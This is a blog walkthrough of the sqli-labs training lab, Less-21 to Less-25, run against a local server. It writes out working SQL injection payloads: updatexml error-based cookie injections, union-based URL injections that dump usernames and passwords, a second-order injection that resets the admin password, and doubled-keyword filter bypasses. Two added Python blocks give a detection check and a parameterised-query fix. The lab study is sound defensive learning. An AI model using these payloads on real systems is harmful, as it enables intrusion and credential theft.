海哥 posted on 2024-8-26 22:59:19

sqlilabs less21-25 manual injection

Less-21

1. Login page

https://i-blog.csdnimg.cn/direct/21616c7247604488b7a64d1b648adaba.png
2. Capture the request with Burp Suite and send it to Repeater

https://i-blog.csdnimg.cn/direct/a8278001f98c4b58af0ad702f4a1b628.png

3. Query the database name (encode the payload first)

')and updatexml(1,concat(1,database()),1)#
https://i-blog.csdnimg.cn/direct/4ffa14dc1a9c43418b68ebeba0d38827.png
https://i-blog.csdnimg.cn/direct/e9cc6ee532484940a75f01f5f1c4e379.png
4. List the tables (encode the payload first)

')and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)
https://i-blog.csdnimg.cn/direct/0aead52f57664342802d1029792576c1.png

https://i-blog.csdnimg.cn/direct/cfe7cdc3d1364a598f6c8b30afc79988.png
5. List the columns (encode the payload first)

')and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #
https://i-blog.csdnimg.cn/direct/8b380732e80e4da58777290227f2b80b.png
https://i-blog.csdnimg.cn/direct/59b36268cf6b4d85b1e072c0e27aa116.png
6. Query all data in the users table

')and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#
https://i-blog.csdnimg.cn/direct/571cac7db9ae4915b6151762adada955.png
https://i-blog.csdnimg.cn/direct/ca46e5aab5bd4927b0213923417db963.png

Less-22

1. Login page

https://i-blog.csdnimg.cn/direct/3f14c5f8c0d742a18bad0e33e0d44986.png
2. Capture the request with Burp Suite and send it to Repeater

https://i-blog.csdnimg.cn/direct/05a58083c0ee4c1896c7516fbaea1dbf.png
3. Query the database name (encode the payload first)

"and updatexml(1,concat(1,database()),1)#
https://i-blog.csdnimg.cn/direct/fad7d55212b746a1b8632c196194dfdd.png
https://i-blog.csdnimg.cn/direct/c01fa1172cf04de18c0162f44775307e.png
4. List the tables (encode the payload first)

"and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
https://i-blog.csdnimg.cn/direct/c8f3d8d6ecb64771b0fb9dd8371ab5b4.png
https://i-blog.csdnimg.cn/direct/137c7daf206d4119b0fb614f8dd86fe6.png
5. List the columns (encode the payload first)

"and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #
https://i-blog.csdnimg.cn/direct/b5254b42ac5a4035b5823db6eae02beb.png
https://i-blog.csdnimg.cn/direct/c4ea8bc48fd04b87a606404974ed6f50.png
6. Query all data in the users table

"and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#
https://i-blog.csdnimg.cn/direct/d49d1c0dd8744bb9ae645f00cae8748f.png
https://i-blog.csdnimg.cn/direct/d569679b9801499689006c7fed090339.png
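
Added example, not part of the original post: a detection check for the encoded cookie payloads used in Less-21 and Less-22. It assumes the cookie is named `uname` and that the encoding step is Base64 (neither is stated above); the rule names are illustrative and the sample headers are constructed by encoding payloads shown on this page.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Rules derived from the payloads shown above; rule names are illustrative.
RULES = [
    ("xml-error-function", re.compile(r"\bupdatexml\s*\(", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\b", re.I)),
    ("aggregate-dump", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("quote-breakout", re.compile(r"""['"]\s*\)?\s*(?:and|or)\b""", re.I)),
]

def decode_cookie(value):
    """Return the Base64-decoded text, or None when the value is not Base64."""
    try:
        raw = base64.b64decode(unquote(value), validate=True)  # '=' may arrive as %3D
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", "replace")

def inspect_cookie_header(header, name="uname"):  # cookie name is an assumption
    """Return the names of the rules matched by the decoded cookie value."""
    for part in header.split(";"):
        key, _, value = part.strip().partition("=")
        if key != name:
            continue
        text = decode_cookie(value)
        if text is None:
            return ["not-base64"]  # a raw value where Base64 is expected
        return [rule for rule, rx in RULES if rx.search(text)]
    return []

def make_cookie(plain):
    """Build a constructed sample header by Base64-encoding `plain`."""
    return "uname=" + base64.b64encode(plain.encode()).decode()

# Constructed samples: one benign value and two payloads copied from this page.
SAMPLES = {
    "benign": "PHPSESSID=abc123; " + make_cookie("admin"),
    "less21": make_cookie("')and updatexml(1,concat(1,database()),1)#"),
    "less22": make_cookie('"and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#'),
    "raw": "uname=admin' or 1",
}

if __name__ == "__main__":
    for label, header in SAMPLES.items():
        print(label, inspect_cookie_header(header))
```

The check has to decode before matching: the same rules applied to the raw Cookie header would see only Base64 text and match nothing.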




Less-23

1. Check whether any position is echoed back in the response

https://i-blog.csdnimg.cn/direct/ecc6c778b5f34c7091e6db14dfdfad1f.png
2. Query the database name

http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,database(),3%20or%20%271%27=%271
https://i-blog.csdnimg.cn/direct/6a941e37c3724d9187cff52935fb091c.png
3. List the tables

http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20or%20%271%27=%271
https://i-blog.csdnimg.cn/direct/99cca157f95d4528946c0898fb7b833d.png
4. List the columns

http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20or%20%271%27=%271
https://i-blog.csdnimg.cn/direct/f2935692b24c47fc861bfca6f9220d3c.png


Less-24

Use second-order injection
1. Register a user

https://i-blog.csdnimg.cn/direct/1b405f7109c84beea5fde7543634858b.png
https://i-blog.csdnimg.cn/direct/a9496f7e7c9143d3b1507ee0ee211576.png
2. The admin password is changed to 777777

https://i-blog.csdnimg.cn/direct/8a8e6c6b8aa340b9b796a27842e09216.png
Less-25

1. The closing delimiter is a single quote '

http://127.0.0.1/Less-25/?id=1%27%20--+
https://i-blog.csdnimg.cn/direct/3646a298dc2f420995a80f6668f680e7.png
2. Query the database name

http://127.0.0.1/Less-25/?id=0%27%20union%20select%201,database(),user()%20--+
https://i-blog.csdnimg.cn/direct/e5768cfa2c7a4739976fd16c3c4526a7.png
3. List all tables in the database

http://127.0.0.1/Less-25/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27--+
https://i-blog.csdnimg.cn/direct/bd7a991a663645eeb1663b56e975c718.png
4. List the columns

http://127.0.0.1/Less-25/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27--+
https://i-blog.csdnimg.cn/direct/f930cc64f7fa4db4b957058c1f11d132.png
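
Added example, not part of the original post: why the doubled keywords in the Less-25 URLs (`infoorrmation_schema`, `anandd`) get through, next to the bound-parameter form that removes the problem. It assumes the lab filter deletes `or` and `and` in a single pass and models the table with SQLite; `strip_once`, the table contents and the test input are constructed for illustration.

```python
import re
import sqlite3

def strip_once(value):
    """Assumed lab filter: delete 'or', then 'and', one pass each, any case."""
    value = re.sub(r"or", "", value, flags=re.I)
    return re.sub(r"and", "", value, flags=re.I)

def make_db():
    """Constructed in-memory stand-in for the lab's users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return db

def lookup_filtered(db, raw_id):
    """Weak form: filter the input, then concatenate it into the SQL text."""
    sql = "SELECT username FROM users WHERE id='%s' LIMIT 1" % strip_once(raw_id)
    return db.execute(sql).fetchall()

def lookup_bound(db, raw_id):
    """Hardened form: the value is bound as data and never parsed as SQL."""
    return db.execute(
        "SELECT username FROM users WHERE id=? LIMIT 1", (raw_id,)
    ).fetchall()

def lookup_validated(db, raw_id):
    """Stricter still: reject anything that is not a plain integer id."""
    if not re.fullmatch(r"\d{1,10}", raw_id):
        return []
    return lookup_bound(db, int(raw_id))

if __name__ == "__main__":
    db = make_db()
    # Tokens taken from the URLs above: removing the inner match rebuilds the keyword.
    for token in ("infoorrmation_schema", "anandd"):
        print(token, "->", strip_once(token))
    doubled = "0' oorr '1'='1"  # constructed test input for this model
    print("filtered:", lookup_filtered(db, doubled))
    print("bound:   ", lookup_bound(db, doubled))
    print("valid id:", lookup_validated(db, "2"))
```

The single-pass filter also damages legitimate data (`strip_once("password")` returns `passwd`), which is a second reason to bind parameters instead of deleting keywords.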

